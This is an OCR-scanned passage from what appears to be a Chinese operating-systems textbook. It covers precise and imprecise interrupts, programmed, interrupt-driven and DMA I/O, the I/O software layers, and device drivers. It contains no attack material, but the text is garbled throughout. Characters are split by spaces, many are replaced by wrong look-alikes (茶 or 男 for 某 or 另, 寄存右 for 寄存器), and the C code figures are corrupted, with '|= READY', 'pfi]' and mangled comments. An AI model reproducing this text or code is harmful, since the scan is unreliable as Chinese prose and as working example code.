载 ) 指向 其 起 点 。 











中 断 服务 过 程 开始 运行 后 ， 它 立刻 通过 将 一 个 确定 的 值 写 到 中 断 控 
制 句 的 茶 个 WO 端口 来 对 中 断 做 出 应 答 。 这 一 应 答 告 诉 中 断 控制 器 可 以 
自由 地 发 出 男 一 个 中 断 。 通 过 让 CPU 延迟 这 一 应 答 直 到 它 准 备 好 处 理 下 
一 个 中 断 ， 就 可 以 避免 与 多 个 几乎 同时 发 生 的 中 断 相 窑 涉 的 竞争 状态 。 
说 句 题 外 的 话 ， 茶 些 (老式 的 ) 计算 机 没有 集中 的 中 断 控制 器 ， 所 以 每 
个 设备 控制 器 请 求 目 己 的 中 断 。 


在 开始 服务 程序 之 前 ， 硬 件 总 是 要 保存 一 定 的 信息 。 哪 些 信息 要 保 





存 以 及 将 其 保存 到 什么 地 方 ， 不 同 的 CPU 之 间 存 在 巨大 的 差别 。 作 为 最 
低 限 度 ， 必 须 保存 程序 计数 器 ， 这 样 被 中 断 的 进程 才能 够 重新 开始 。 在 
男 一 个 极端 ， 所 有 可 见 的 寄存 器 和 很 多 内 部 寄存 右 或 许 也 要 保存 。 





将 这 些 信息 保 存 到 什么 地 方 古 一 个 问题 。 一 种 选择 是 将 其 放 入 内 部 
寄存 右 中 ， 在 需要 时 操作 系统 可 以 读 出 这 些 内 部 寄存 器。 这 一 方法 的 问 
题 是 ， 中 断 控制 器 之 后 无 法 得 到 应 答 ， 直 到 所 有 可 能 的 相关 信息 被 读 
出 ， 以 免 第 二 个 中 断 重 写 内 部 寄存 器 保存 状态 。 这 一 末 略 在 中 断 被 禁止 
时 将 导致 长 时 间 的 死机 ， 并 且 可 能 丢失 中 断 和 丢失 数据 。 


T 





因此 ， 大 多 数 CPU 在 堆栈 中 保存 信息 。 然 而 ， 这 种 方法 也 有 问题 。 
首先 ， 使 用 谁 的 堆栈 ? 如 果 使 用 当前 堆栈 ， 则 它 很 可 能 是 用 户 进 程 的 堆 
栈 。 扒 栈 指针 甚至 可 能 不 是 合法 的 ， 这 样 当 硬 件 试图 在 它 所 指 的 地 址 处 
写 茶 些 字 时 ， 将 导致 致命 错误 。 此 外 ， 邱 可 能 指 同一 个 页 面 的 末端 。 知 
干 次 内 存 写 之 后 ， 页 面 边 界 可 能 被 超出 并 且 产 生 一 个 页 面 故 障 。 在 硬件 
中 断 处 理 期 间 如 果 发 生 页 面 故 隐 将 引起 更 大 的 问题 : 在 何 处 保存 状态 以 
处 理 页 面 故障 ? 











如 果 使 用 内 核 堆栈 ， 将 存在 更 多 的 堆栈 指针 是 合法 的 并 且 指 向 一 个 
回 定 的 页 面 的 机 会 。 然 而 ， 切 换 到 核心 态 可 能 要 求 改变 MMU 上 下 文 ， 
并 且 可 能 使 高 速 缓存 和 TLB 的 大 部 分 或 全 部 失效 。 静 态 地 或 动态 地 重新 
装载 所 有 这 些 东 西 将 增加 处 理 一 个 中 断 的 时 间 ， 因 而 浪费 CPU 的 时 间 。 





精确 中 断 和 不 精确 中 断 





另 一 个 问题 是 由 下 面 这 样 的 事实 引起 的 : 现代 CPU 大 量 地 采用 流水 
线 并 且 有 时 还 采用 超标 量 〈 内 部 并 行 ) 。 在 老式 的 系统 中 ， 每 条 指令 完 
成 执行 之 后 ， 微 程序 或 硬件 将 检查 是 侣 存在 悬而未决 的 中 断 。 如 宋 存 
在 ， 那 么 程序 计数 器 和 PSW 将 和 伞 压 入 堆栈 中 而 中 断 序列 将 开始 。 在 中 断 
处 理 程序 运行 之 后 ， 相 反 的 过 程 将 会 友 生 ， 旧 的 PSW 和 程序 计数 器 将 从 
堆栈 中 弹出 并 且 先 前 的 进程 继续 运行 。 

















这 一 模型 使 用 了 隐 伟 的 假设 ， 这 就 是 如 果 一 个 中 断 正 好 在 菏 一 指令 
之 后 发 生 ， 那 么 这 条 指令 前 的 所 有 指令 (包括 这 条 指令 ) 都 完整 地 执行 
过 了 ， 而 这 条 指令 后 的 指令 一 条 也 没有 执行 。 在 老式 的 机 器 上 ， 这 一 假 
设 总 是 正确 的 ， 而 在 现代 计算 机 上 ， 这 一 假设 则 未 必 是 正确 的 。 








首先 ， 考 虑 图 1-6a 的 流水 线 模 型 。 在 流水 线 满 的 时 候 (通常 的 情 
形 ) ， 如 果 出 现 一 个 中 断 ， 那 么 会 发 生 什么 情况 ? 许多 指令 正 处 于 各 种 
不 同 的 执行 阶段 ， 当 中 断 出 现时 ， 程 序 计 数 占 的 值 可 能 无 法 正确 地 反映 
己 经 执行 过 的 指令 和 尚未 执行 的 指令 之 间 的 边界 。 事 实 上 ， 许 多 指令 可 
能 部 分 地 执行 了， 不 同 的 指令 完成 的 程度 或 多 或 少 。 在 这 种 情况 下 ， 程 
序 计 数 器 更 有 可 能 反映 的 是 将 要 被 取出 并 压 入 流水 线 的 下 一 条 指令 的 地 
址 ， 而 不 是 刚刚 被 执行 单元 处 理 过 的 指令 的 地 址 。 


在 如 图 1-7b 所 示 的 超标 量 计 算 机 上 ， 事 情 更 加 糟糕 。 指 令 可 能 分 解 


成 微 操作 ， 而 微 操作 有 可 能 乱 序 执行 ， 这 取决 于 内 部 资源 〈 如 功能 单元 
和 寄存 器 ) 的 可 用 性 。 当 中 断 发 生 时 ， 茶 些 很 久 以 前 启动 的 指令 可 能 还 
没 开始 执行 ， 而 其 他 最 近 局 动 的 指令 可 能 几乎 要 完成 了 。 当 中 断 信号 出 
现时 ， 可 能 存在 许多 指令 处 于 不 同 的 完成 状态 ， 它 们 与 程序 计数 器 之 间 
没有 什么 关系 。 











将 机 器 留 在 一 个 明确 状态 的 中 汤 称 为 精确 中 汤 Cprecise interrupt) 
(Walker#llCragon, 1995) 。 精 确 中 断 具 有 4 个 特性 : 





DPC 程序 计数 器 ) 保存 在 一 个 已 知 的 地 方 。 
2)PC 所 指向 的 指令 之 前 的 所 有 指令 已 经 完全 执行 。 
3)PC 所 指向 的 指令 之 后 的 所 有 指令 都 没有 执行 。 
4)PC 所 指向 的 指令 的 执行 状态 是 已 知 的 。 


注意 ， 对 于 PC 所 指向 的 指令 之 后 的 那些 指令 来 说 ， 此 处 并 没有 茶 
止 它 们 开始 执行 ， 而 只 是 要 求 在 中 断 发 生 之 前 必须 撤销 它们 对 寄存 器 或 
内 存 所 做 的 任何 修改 。PC 所 指 回 的 指令 有 可 能 已 经 执行 了 ， 也 有 可 能 
还 没有 执行 ， 然 而 ， 必 须 清楚 适用 的 是 哪 种 情况 。 通 常 ， 如 果 中 断 是 一 
个 IO 中 断 ， 那 么 指令 就 会 还 没有 开始 执行 。 然 而 ， 如 果 中 断 实 际 上 是 
一 个 陷阱 或 者 页 面 故 区， 那么 PC 一 般 指 问 导 致 错误 的 指令 ， 所 以 它 以 
后 可 以 重新 开始 执行 。 图 5-6a 所 示 的 情形 描述 了 精确 中 断 。 程 序 计 数 喜 














(316) 之 前 的 所 有 指令 都 已 经 完成 了 ， 而 它 之 后 的 指令 都 还 没有 局 动 
《或 者 已 经 回 退 以 撤销 它们 的 作用 ) 。 
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图 56 四 精确 中 断 ; 日 不 精确 中 断 


不 满足 这 些 要 求 的 中 断 称 为 不 精确 中 断 〈imprecise interrupt) ， 不 
精确 中 断 使 操作 系统 编写 者 过 得 极为 不 愉快 ， 现 在 操作 系统 编写 者 必须 
晰 定 已 经 发 生 了 什么 以 及 还 要 发 生 什 么 。 图 5-6b 描 述 了 不 精确 中 断 ， 其 

邻近 程序 计数 器 的 不 同 指令 处 于 不 同 的 完成 状态 ， 老 的 指令 不 一 定 比 
新 的 指令 完成 得 更 多 。 具 有 不 精确 中 断 的 机 器 通常 将 大 量 的 内 部 状 
态 “ 吐 出 ”到 堆栈 中 ， 从 而 使 操作 系统 有 可 能 判断 出 正在 发 生 什么 事情 。 
重新 启动 机 器 所 必需 的 代码 通常 极其 复杂 。 此 外 ， 在 每 次 中 断 发 生 时 将 
大 量 的 信息 保存 在 内 存 中 使 得 中 断 响 应 十 分 缓慢 ， 而 恢复 则 更 加 精 糕 。 
这 就 导致 具有 讽刺 意味 的 情形 : 由 于 缓慢 的 中 断 使 得 非常 快速 的 超标 量 
CPU 有 时 并 不 适合 实时 工作 。 





























有 些 计算 机 设计 成 条 些 种 类 的 中 断 和 陷阱 是 精确 的 ， 而 其 他 的 不 
是 。 例 如 ， 可 以 让 VO 中 断 是 精确 的 ， 而 归 因 于 致命 编程 错误 的 陷阱 是 
不 精确 的 ， 由 于 在 被 0 除 之 后 不 需要 尝试 重新 开始 运行 的 进程 ， 所 以 这 
样 做 也 不 错 。 有 些 计 算 机 具有 一 个 位 ， 可 以 设置 它 强 过 所 有 的 中 断 都 是 
精确 的 。 设 置 这 一 位 的 不 利之 处 是 ， 它 强迫 CPU 仔细 地 将 正在 做 的 一 切 
事情 记 入 日 志 并 且 维 护 寄存 器 的 影子 副本 ， 这 样 才 能 够 在 任意 时 刻 生成 
精确 中 断 。 所 有 这 些 开销 都 对 性 能 具有 较 大 的 影响 。 











某 些 超标 量 计算 机 《例如 Pentium 系 列 ) 具有 精确 中 断 ， 从 而 使 老 
的 软件 正确 工作 。 为 精确 中 断 付出 的 代价 是 CPU 内 部 极其 复杂 的 中 断 逻 
辑 ， 以 便 确 保 当 中 岂 控 制 器 发 出 信号 想 要 导致 一 个 中 断 时 ， 人 允许 直到 某 
一 点 之 前 的 所 有 指令 完成 而 不 允许 这 一 点 之 后 的 指令 对 机 器 状态 产生 任 
何 重 要 的 影响 。 此 处 付出 的 代价 不 是 在 时 间 上 ， 而 是 在 心 片 面积 和 设计 
复杂 性 上 。 如 果 不 是 因为 向 后 兼容 的 目的 而 要 求 精确 中 断 的 话 ， 这 一 态 
片面 积 就 可 以 用 于 更 大 的 片上 高 速 缓存 ， 从 而 使 CPU 的 速度 更 快 。 忆 一 
方面 ， 不 精确 中 断 使 得 操作 系统 更 为 复杂 而 且 运 行 得 更 加 缓慢 ， 所 以 断 
定 哪 一 种 方法 更 好 是 十 分 困难 的 。 





5.2 ”IO 软件 原理 


在 讨论 了 IO 硬件 之 后 ， 下 面 我 们 来 看 一 看 MO 软件 。 首 先 我 们 将 看 
一 看 IO 软件 的 目标 ， 然 后 从 操作 系统 的 观点 来 看 一 看 MO 实现 的 不 同方 
ve 





5.2.1 IO 软件 的 目标 


在 设计 IO 软件 时 一 个 关键 的 概念 是 设备 独立 性 〈device 
independence) 。 它 的 意思 是 应 该 能 够 编写 出 这 样 的 程序 : 它 可 以 访问 
任意 IO 设备 而 无 需 事先 指定 设备 。 例 如 ， 读 取 一 个 文件 作为 输入 的 程 
序 应 该 能 够 在 硬盘 、CD-ROM、DVD 或 者 USB 盘 上 读 取 文件 ， 无 需 为 每 
一 种 不 同 的 设备 修改 程序 。 类 似 地 ， 用 户 应 该 能 够 键入 这 样 一 条 命令 


sort<input>output 





并 且 无 论 输 入 来 自任 意 类 型 的 存储 盘 或 者 键盘 ， 输 出 送 往 任意 类 型 
的 存储 盘 或 者 屏幕 ， 上 述 命令 都 可 以 工作 。 尽 管 这 些 设备 实际 上 兰 别 很 
大 ， 需 要 非常 不 同 的 命令 序列 来 读 或 号， 但 这 一 事实 所 带 来 的 问题 将 由 
操作 系统 负责 处 理 。 





与 设备 独立 性 密切 相关 的 是 统一 命名 Cuniform naming) 这 一 目 


标 。 一 个 文件 或 一 个 设备 的 名 字 应 该 是 一 个 简单 的 字符 串 或 一 个 整数 ， 
它 不 应 依赖 于 设备 。 在 UNIX 系 统 中 ， 所 有 存储 盘 都 能 以 任意 方式 集成 
到 文件 系统 层次 结构 中 ， 因 此 ， 用 户 不 必 知 道 哪个 名 字 对 应 于 哪 台 设 
备 。 例 如 ， 一 个 USB 盘 可 以 安装 (mount) 到 目录 /usrasUbackup 下 ， 这 
样 复制 一 个 文件 到 /usr/ast/backup/monday 就 是 将 文件 复制 到 USB 盘 上 。 
用 这 种 方法 ， 所 有 文件 和 设备 都 采用 相同 的 方式 一 一 路 径 名 进行 寻 址 。 








IO 软件 的 另 一 个 重要 问题 是 错误 处 理 Cerror handling) 。 一 般 来 
说 ， 错 误 应 该 尽 可 能 地 在 接近 硬件 的 层面 得 到 处 理 。 当 控制 器 发 现 了 一 
个 读 错 误 时 ， 如 有 果 它 能 够 处 理 那么 就 应 该 自己 设法 纠正 这 一 错误 。 如 果 
控制 器 处 理 不 了 ， 那 么 设备 驱动 程序 应 当 予 以 处 理 ， 可 能 只 需 重 读 一 次 
这 块 数据 就 正确 了 。 很 多 错误 是 偶然 性 的 ， 例 如 ， 磁 盘 读 写 头 上 的 灰尘 
导致 读 写 错 误 时 ， 重 复 该 操作 ， 错 误 经 常 就 会 消失 。 只 有 在 低层 软件 处 
理 不 了 的 情况 下 ， 才 将 错误 上 交 高 层 处 理 。 在 许多 情况 下 ， 错 误 恢复 可 
以 在 低层 透明 地 得 到 解决 ， 而 高 层 软件 甚至 不 知道 存在 这 一 错误 。 











另 一 个 关键 问题 是 同步 (synchronous) 〈 即 阻塞 ) 和 异步 
(asynchronous) 〈 即 中 断 驱动 传输 。 大 多 数 物 理 W/O 是 异步 的 一 一 
CPU 启动 传输 后 便 转 去 做 其 他 工作 ， 直 到 中 断 发 生 。 如 果 IO 操 作 是 阻 
塞 的 ， 那 么 用 户 程序 就 更 加 容易 编写 一 一 在 read 系 统 调 用 之 后 ， 程 序 将 
自动 被 挂 起 ， 直 到 缓冲 区 中 的 数据 准备 好 。 正 是 操作 系统 使 实际 上 是 中 
断 驱 动 的 操作 变 为 在 用 户 程序 看 来 是 阻塞 式 的 操作 。 








IO 软件 的 另 一 个 问题 是 缓冲 〈buffering) 。 数 据 离开 一 个 设备 之 后 
通 第 并 不 能 直接 存放 到 其 最 终 的 目的 地 。 例 如 ， 从 网 络 上 进来 一 个 数据 
包 时 ， 直 到 将 该 数据 包 存 放 在 某 个 地 方 并 对 其 进行 检查 ， 操 作 系 统 才 知 
道 要 将 其 置 于 何 处 。 此 外 ， 某 些 设备 具有 严格 的 实时 约束 〈 例 如， 数字 
音频 设备 ) ， 所 以 数据 必须 预先 放置 到 输出 缓冲 区 之 中 ， 从 而 消除 缓冲 
区 填 满 速率 和 缓冲 区 清空 速率 之 间 的 相互 影响 ， 以 避免 缓冲 区 欠 载 。 绥 
冲 涉及 大 量 的 复制 工作 ， 并 且 经 常 对 1/O 性 能 有 重大 影响 。 


此 处 我 们 将 提 到 的 最 后 一 个 概念 是 共享 设备 和 独占 设备 的 问题 。 有 
些 IO 设 备 〈《 如 磁盘 ) 能 够 同时 让 多 个 用 户 使 用 。 多 个 用 户 同 时 在 同一 
人 磁盘 上 打开 文件 不 会 引起 什么 问题 。 其 他 设备 (如 磁带 机 〉 则 必须 由 单 
个 用 户 独 占 使 用 ， 直 到 该 用 户 使 用 完 ， 为 一 个 用 户 才 能 拥有 该 磁带 机 。 
让 两 个 或 更 多 的 用 户 随 机 地 将 交叉 混杂 的 数据 块 写 入 相同 的 磁 高 是 注定 
不 能 工作 的 。 独 占 〈 非 共享 ) 设备 的 引入 也 带 来 了 各 种 各 样 的 问题 ， 如 
死 锁 。 同 样 ， 操 作 系 统 必须 能 够 处 理 共享 设备 和 独占 设备 以 避免 问题 发 
HE 


5.2.2 ”程序 控制 IO 





IO 可 以 以 三 种 根本 不 同 的 方式 实现 。 在 本 小 节 中 我 们 将 介绍 第 一 
种 《程序 控制 1O) ， 在 后 面 两 小 节 中 我 们 将 研究 另外 两 种 〈 中 断 驱 动 
IO 和 使 用 DMA 的 O) 。LIO 的 最 简单 形式 是 让 CPU 做 全 部 工作 ， 这 一 
方法 称 为 程序 控制 WO (programmed I/O) 。 


借助 于 例子 来 说 明 程 序 控制 WO 是 最 简单 的 。 考 虑 一 个 用 户 进程 ， 
该 进程 想 在 打印 机 上 打印 8 个 字符 的 字符 串 “ABCDEFGH”。 它 首先 要 在 
用 户 空间 的 一 个 缓冲 区 中 组 装 字符 串 ， 如 图 5-7a 所 示 。 


然后 ， 用 户 进程 通过 发 出 系统 调用 打开 打印 机 来 获得 打印 机 以 便 进 
行 写 操作 。 如 果 打 印 机 当前 被 男 一 个 进程 占用 ， 该 系统 调用 将 失败 并 返 
回 一 个 错误 代码 ， 或 者 将 阻塞 直到 打印 机 可 用 ， 有 基体 情况 取 雇 于 操作 系 
统 和 调用 参数 。 一 旦 拥有 打印 机 ， 用 户 进 程 就 发 出 一 个 系统 调用 通知 操 
作 系 统 在 打印 机 上 打印 字符 串 。 


然后 ， 操 作 系 统 ( 通 常 ) 将 字符 串 缓 冲 区 复制 到 内 核 空间 中 的 一 个 
BA Cp) 中， 在 这 里 访问 更 加 容易 《因为 内 核 可 能 必须 修改 内 存 映 
味 才 能 到 达 用 户 空间 〉。 然 后 操作 系统 要 查看 打印 机 当前 是 否 可 用 。 如 
果 不 可 用 ， 就 要 等 待 直到 它 可 用 。 一 旦 打印 机 可 用 ， 操 作 系 统 就 复制 第 
一 个 字符 到 打印 机 的 数据 寄存 器 中 ， 在 这 个 例子 中 使 用 了 内 存 映 册 


IO。 这 一 操作 将 激活 打印 机 。 字 符 也 许 还 不 会 出 现在 打印 机 上 ， 因 为 
茶 些 打印 机 在 打印 任何 东西 之 前 要 先 绥 冲 一 行 或 一 页 。 然 而 ， 在 图 5-7b 
中 ， 我 们 看 到 第 一 个 字符 已 经 打印 出 来 ， 并 且 系 统 已 经 将 “B” 标 记 为 下 


一 个 待 打印 的 字符 。 





待 打 印 的 





图 5-7 打印 一 个 字符 串 的 步骤 





一 旦 将 第 一 个 字符 复制 到 打印 机 ， 操 作 系统 就 要 租 看 打印 机 是 售 束 
绪 准 备 接收 另 一 个 字符 。 一 般 而 言 ， 打 印 机 都 有 第 二 个 寄存 器 ， 用 于 表 
明 其 状态 。 将 字符 写 到 数据 寄存 器 的 操作 将 导致 状态 变 为 非 就 绪 。 当 打 
印 机 控制 器 处 理 完 当 前 字符 时 ， 它 就 通过 在 其 状态 寄存 器 中 设置 条 一 位 
或 者 将 杀 个 值 放 到 状态 寄存 器 中 来 表示 其 可 用 性 。 


这 时 ， 操 作 系统 将 等 待 打印 机 状态 再 次 变 为 就 绪 。 打 印 机 就 绪 事件 
发 生 时 ， 操 作 系统 就 打印 下 一 个 字符 ， 如 图 5-7c 所 示 。 这 一 循环 继续 进 
行 ， 直 到 整个 字符 串 打印 完 。 然 后 ， 控 制 返 回 到 用 户 进程 。 


操作 系统 相继 采取 的 操作 总 结 在 图 5-8 中 。 首 先 ， 数 据 被 复制 到 内 
核 空间 。 然 后 ， 操 作 系 统 进入 一 个 密闭 的 循环 ， 一 次 输出 一 个 字符 。 在 
该 图 中 ， 清 楚 地 说 明了 程序 控制 /O 的 最 根本 的 方面 ， 这 就 是 输出 一 个 
字符 之 后 ，CPU 要 不 断 地 查询 设备 以 了 解 它 是 否 就 绪 准 备 接收 男 一 个 字 
符 。 这 一 行为 经 常 称 为 轮 询 (polling) 或 忙 等 待 (busy waiting) 。 


copy_from_user(buffer, p, count); i pat 内 核 缓冲 区 */ 
for (i = 0; i < count; i++) { 1* 对 每 个 : 符 循 环 */ 
while (*printer_status_reg |= READY) ; ee 循环 直到 就 绪 */ 


*printer_data_register = p[i]; /* 输出 一 个 字符 */ 


return_to_user( ); 





图 5-8 使 用 程序 控制 IO 将 一 个 字符 串 写 到 打印 机 





程序 控制 IO 十 分 简单 但 是 有 缺点 ， 即 直到 全 部 IO 完成 之 前 要 占用 
CPU 的 全 部 时 间 。 如 果 “ 打 印 ” 一 个 字符 的 时 间 非 常 短 〈 因 为 打印 机 所 做 
的 全 部 事情 束 是 将 新 的 字符 复制 到 一 个 内 部 缓冲 区 中 〉， ， 那 么 忙 等 生还 
是 不 错 的 。 此 外 ， 在 组 入 式 系统 中 ，CPU 没 有 其 他 事情 要 做 ， 忙 等 等 也 
是 合理 的 。 然 而 ， 在 更 加 复杂 的 系统 中 ，CPU 有 其 他 工作 要 做 ， 和 忙 等 竺 
将 是 低 效 的 ， 需 要 更 好 的 IO 方法 。 








5.2.3 ”中断 驱动 IO 


现在 我 们 考虑 在 不 缓冲 字符 而 是 在 每 个 字符 到 来 时 便 打 印 的 打印 机 
上 进行 打印 的 情形 。 如 果 打 印 机 每 秒 可 以 打印 100 个 人 字符， 那么 打印 每 
个 字符 将 人 花费 10ms。 这 意味 者 ， 当 每 个 字符 写 到 打印 机 的 数据 寄存 器 中 
之 后 ，CPU 将 有 10ms 搁 置 在 无 价值 的 循环 中 ， 等 竺 允许 输出 下 一 个 字 
符 。 这 10ms 时 间 足 以 进行 一 次 上 下 文 切 换 并 且 运 行 其 他 进程 ， 人 否则 就 当 
HT o 





这 种 允许 CPU 在 等 待 打印 机 变 为 就 绪 的 同时 做 某 些 其 他 事情 的 方式 
就 是 使 用 中 断 。 当 打印 字符 串 的 系统 调用 被 发 出 时 ， 如 我 们 前 面 所 介绍 
的 ， 字 符 串 缓冲 区 被 复制 到 内 核 空间 ， 并 且 一 旦 打印 机 准备 好 接收 一 个 
字符 时 就 将 第 一 个 字符 复制 到 打印 机 中 。 这 时 ，CPU 要 调用 调度 程序 ， 
并 且 某 个 其 他 进程 将 运行 。 请 求 打 印字 符 串 的 进程 将 被 阻塞 ， 直 到 整个 
字符 串 打印 完 。 系 统 调用 所 做 的 工作 如 图 5-9a 所 示 。 





当 打 印 机 将 字符 打印 完 并 且 准 备 好 接收 下 一 个 字符 时 ， 它 将 产生 一 
个 中 断 。 这 一 中 断 将 停止 当前 进程 并 且 保 存 其 状态 。 然 后 ， 打 印 机 中 断 
服务 过 程 将 运行 。 图 5-9b 所 示 为 打印 机 中 断 服 务 过 程 的 一 个 粗略 的 版 
本 。 如 有 果 没 有 更 多 的 字符 要 打印 ， 中 断 处 理 程序 将 采取 茶 个 操作 将 用 户 
进程 解除 阻 暑 。 否 则 ， 它 将 输出 下 一 个 人 字符， 应 答 中 断 ， 并 且 返 回 到 中 








上 晰 之 前 正在 运行 的 进程 ， 该 进程 将 从 其 停止 的 地 方 继续 运行 。 


copy_from_user(buffer, p, count); if (count == 0) { 
enable _interrupts( ); unblock _user( ); 
while (*printer_status_reg != READY) ; } else { 
*printer_data_register = p[0]; *printer_data_register = pfi]; 
scheduler‘ ); count = count — 1; 
ye 


acknowledge_interrupt( ); 
return_from_interrupt( ); 





a) b) 


图 5-9 使 用 中 断 驱 动 I/O 将 一 个 字符 串 写 到 打印 机 : a) HAT HP RAW 
用 被 发 出 时 执行 的 代码 ; b) 打 印 机 的 中 断 服务 过 程 


5.2.4 使 用 DMA 的 LO 


中 断 驱 动 JO 的 一 个 明显 缺点 是 中 断 发 生 在 每 个 字符 上 。 中 断 要 人 花 
费时 间 ， 所 以 这 一 方法 将 浪费 一 定数 量 的 CPU 时 间 。 这 一 问题 的 一 种 解 
决 方法 是 使 用 DMA。 此 处 的 思路 是 让 DMA 控 制 器 一 次 给 打印 机 提供 一 
个 字符 ， 而 不 必 打 扰 CPU。 本 质 上 ，DMA 是 程序 控制 1JO， 只 是 由 DMA 
控制 器 而 不 是 主 CPU 做 全 部 工作 。 这 一 策略 需要 特殊 的 硬件 (DMA 控 
制 器 ) ， 但 是 使 CPU 获得 自由 从 而 可 以 在 MO 期 间 做 其 他 工作 。 使 用 
DMA 的 代码 概要 如 图 5-10 所 示 。 





copy _from_user(buffer, p, count); 
set_up_DMA_-controller( ); 


Scheduler( ); 





a) 


图 5-10 使 用 DMA 打 印 一 个 字符 串 : 有 ) 当 打印 系统 调用 被 发 出 时 执行 
的 代码 ; b) 中 断 服务 过 程 


DMA 重 大 的 成 功 是 将 中 断 的 次 数 从 打印 每 个 字符 一 次 减少 到 打印 
每 个 缓冲 区 一 次 。 如 果 有 许多 字符 并 且 中 断 十 分 缓慢 ， 那 么 采用 DMA 
可 能 是 重要 的 改进 。 另 一 方面 ，DMA 控 制 器 通常 比 主 CPU 要 慢 很 多 。 
如 果 DMA 控 制 器 不 能 以 全 速 驱动 设备 ， 或 者 CPU 在 等 竺 DMA 中 断 的 同 
时 没有 其 他 事情 要 做 ， 那 么 采用 中 断 驱 动 O 甚 至 采用 程序 控制 IO 也 许 





更 好 。 


5.3 IO 软件 层次 


1/O 软 件 通 常 组 织 成 四 个 层次 ， 如 图 5-11 所 示 。 每 一 层 具 有 一 个 要 执 
行 的 定义 明确 的 功能 和 一 个 的 定义 明确 的 与 邻近 层次 的 接口 。 功 能 与 接 
口 随 系统 的 不 同 而 不 同 ， 所 以 下 面 的 讨论 并 不 针对 一 种 特定 的 机 右 。 我 
们 将 从 底层 开始 讨论 每 一 层 。 


用 户 级 IO 软件 


与 设备 无 关 的 操作 系统 软件 
设备 驱动 程序 

中 断 处 理 程序 

硬件 








图 5-11 I/O 软 件 系 统 的 层次 


5.3.1 中 晰 处 理 程 序 


虽然 程序 控制 JO 偶 尔 是 有 益 的 ， 但 是 对 于 大 多 数 UO 而 言 ， 中 断 是 
令 人 不 愉快 的 事情 并 且 无 法 避免 。 应 当 将 其 深 深 地 隐藏 在 操作 系统 内 
部 ， 以 便 系 统 的 其 他 部 分 尽量 不 与 它 发 生 联系 。 隐 藏 它们 的 最 好 办 法 是 
将 启动 一 个 IO 操作 的 驱动 程序 阻塞 起 来 ， 直 到 IO 操作 完成 且 产生 一 个 











中 断 。 驱 动 程序 阻塞 目 己 的 手段 有 : 在 一 个 信号 量 上 执行 down 操 作 、 
在 一 个 条 件 变 量 上 执行 wait 操 作 、 在 一 个 消息 上 执行 receive 操 作 或 者 有 
些 类 似 的 操作 。 





当中 断 发 生 时 ， 中 断 处 理 程序 将 做 它 必 须要 做 的 全 部 工作 以 便 对 中 
肠 进 行 处 理 。 然 后 ， 它 可 以 将 局 动 中 断 的 驱动 程序 解除 阻塞 。 在 一 些 情 
形 中 ， 它 只 是 在 一 个 信号 量 上 执行 up 操作 ， 其 他 情形 中 ， 是 对 管 程 中 的 
条 件 变量 执行 signal 操 作 ， 还 有 一 些 情形 中 ， 是 癌 被 阻塞 的 驱动 程序 发 
一 个 消息 。 在 所 有 这 些 情形 中 ， 中 断 最 终 的 结果 是 使 匈 前 被 阻塞 的 驱动 
程序 现在 能 够 继续 运行 。 如 果 驱 动 程序 构造 为 内 核 进程 ， 具 有 它们 目 己 
的 状态 、 扒 栈 和 程序 计数 器 ， 那 么 这 一 模型 运转 得 最 好 。 























当然 ， 现 实 没有 如 此 简单 。 对 一 个 中 断 进 行 处 理 并 不 只 是 简单 地 捕 
获 中 断 ， 在 茶 个 信号 量 上 执行 up 操作 ， 然 后 执行 一 条 IRET 指 令 从 中 晰 
返回 到 先前 的 进程 。 对 操作 系统 而 言 ， 还 涉及 更 多 的 工作 。 我 们 将 按 一 
系列 步骤 给 出 这 一 工作 的 轮廓 ， 这 些 步 又 是 硬件 中 断 完 成 之 后 必须 在 软 
件 中 执行 的 。 应 该 注意 的 是 ， 细 节 是 非常 依赖 于 系统 的 ， 所 以 下 面 列 出 
的 东 些 步骤 在 一 个 特定 的 机 器 上 可 能 是 不 必要 的 ， 而 没有 列 出 的 步骤 可 
能 是 必需 的 。 此 外 ， 确 实 发 生 的 步骤 在 茶 些 机 器 上 也 可 能 有 不 同 的 顺 








1) 保 存 没 有 被 中 断 硬 件 保存 的 所 有 寄存 右 〈 包 括 PSW) 。 


2) 为 中 断 服务 过 程 设 置 上 下 文 ， 可 能 包括 设置 TLB、MMU 和 页 


3) 为 中 断 服 务 过 程 设置 堆栈 。 


4) 应 答 中 断 控制 器 ， 如 果 不 存 在 集中 的 中 断 控 制 器 ， 则 再 次 开放 中 


5) 将 寄存 器 从 它们 被 保存 的 地 方 ( 可 能 是 某 个 堆栈 ) 复制 到 进程 表 


0) 运行 中 断 服务 过 程 ， 从 发 出 中 断 的 设备 控制 旨 的 寄存 器 中 提取 信 





7) 选 择 下 一 次 运行 哪个 进程 ， 如 果 中 断 导 致 某 个 被 阻 窗 的 电 优 先 级 
进程 变 为 就 绪 ， 则 可 能 选择 它 现在 融 运 行 。 





8) 为 下 一 次 要 运行 的 进程 设置 MMU 上 下 文 ， 也 许 还 需要 设置 某 个 
TLB。 


9) 装 入 新 进程 的 寄存 器 ， 包 括 其 PSW。 
10) 开 始 运 行 新 进程 。 


由 此 可 见 ， 中 断 处 理 远 不 是 无 足 轻重 的 小 事 。 它 要 花费 相当 多 的 
CPU 指令 ， 特 别 是 在 存在 虚拟 内 存 并 且 必 须 设 置 页 表 或 者 必须 保存 





MMU 状 态 〈 例 如 R 和 M 位 ) 的 机 器 上 。 在 某 些 机 器 上 ， 当 在 用 户 态 与 核 
心态 之 间 切 换 时 ， 可 能 还 需要 管理 TLB 和 CPU 高 速 缓存 ， 这 就 要 花费 额 
外 的 机 器 周期 。 


5.3.2 ”设备 驱动 程序 


在 本 章 前 面 的 内 容 中 ， 我 们 介绍 了 设备 控制 器 所 做 的 工作 。 我 们 注 
意 到 每 一 个 控制 嚣 都 设 有 茶 些 设备 寄存 器 用 来 回 设备 发 出 命令 ， 或 者 设 
有 某 些 设备 寄存 器 用 来 读 出 设备 的 状态 ， 或 者 设 有 这 两 种 设备 寄存 器 。 
设备 寄存 器 的 数量 和 命令 的 性 质 在 不 同 设备 之 间 有 痢 根 本 性 的 不 同 。 例 
如 ， 鼠 标 驱 动 程序 必须 从 鼠标 接收 信息 ， 以 识别 鼠标 移动 了 多 远 的 距离 
以 及 当前 哪 一 个 键 被 按 下 。 相 反 ， 人 磁盘 驱动 程序 可 能 必须 要 了 解 局 区 、 
磁道 、 柱 面 、 人 磁 尖 、 人 磁盘 璧 移动、 电机 驱动 费 、 磁 头 定 位 时 间 以 及 所 有 
其 他 保证 磁盘 正常 工作 的 机 制 。 显 然 ， 这 些 驱 动 程序 是 有 很 大 区 别 的 。 




















